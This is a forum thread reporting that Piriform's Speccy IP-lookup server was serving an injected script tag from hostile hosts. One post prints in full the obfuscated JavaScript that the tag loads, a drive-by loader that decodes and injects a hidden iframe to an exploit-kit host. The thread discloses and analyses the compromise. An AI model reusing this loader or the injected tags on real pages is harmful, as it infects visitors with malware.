Speccy querying a hacked page

While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx"

with the ending x's being the rest of my public IP.

speccyi.png

I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on.

When I do that, I get this:

avastu.png

The javascript is:

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var 
o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,
i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; 
f++){O=b(o[f]);D+=J(O);}b(D);

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

Basically what's happening is that Speccy is querying your IP address by going to this URL:

http://speccy.piriform.com/ip/

The content being returned, though, is not only the IP address but also a piece of JavaScript.

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

Speccy is 100% compromised. That JavaScript loads an exploit kit, which has now downloaded some malware onto my Virtual Machine.

Pretty sure this would be considered a critical security flaw.

-kN

/me gets the same as the above screeny of Speccy.

Also,

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the JavaScript to launch, and boom, you are infected.

Thanks everyone for bringing this to the attention of Piriform.

I have sent a mass PM out to alert Piriform, so hopefully this can be taken care of right away.

Thanks, SpySentinel. :)

cheers.

The Publish Snapshot is also affected.

<script type="text/javascript" src="http://arent.xip.pl/js.php"></script>http://speccy.piriform.com/results/FmdnvYm6byY0qjs3QKp8w8D

Visiting a Snapshot link gives another blocked Trojan:

snapshotr.png

Problem has been fixed. We're currently performing a full investigation into that server.

Please note that the software is fine and doesn't contain a virus, it's a fault on our Speccy server.

Thanks, MrG.

I'm curious to know how this happened...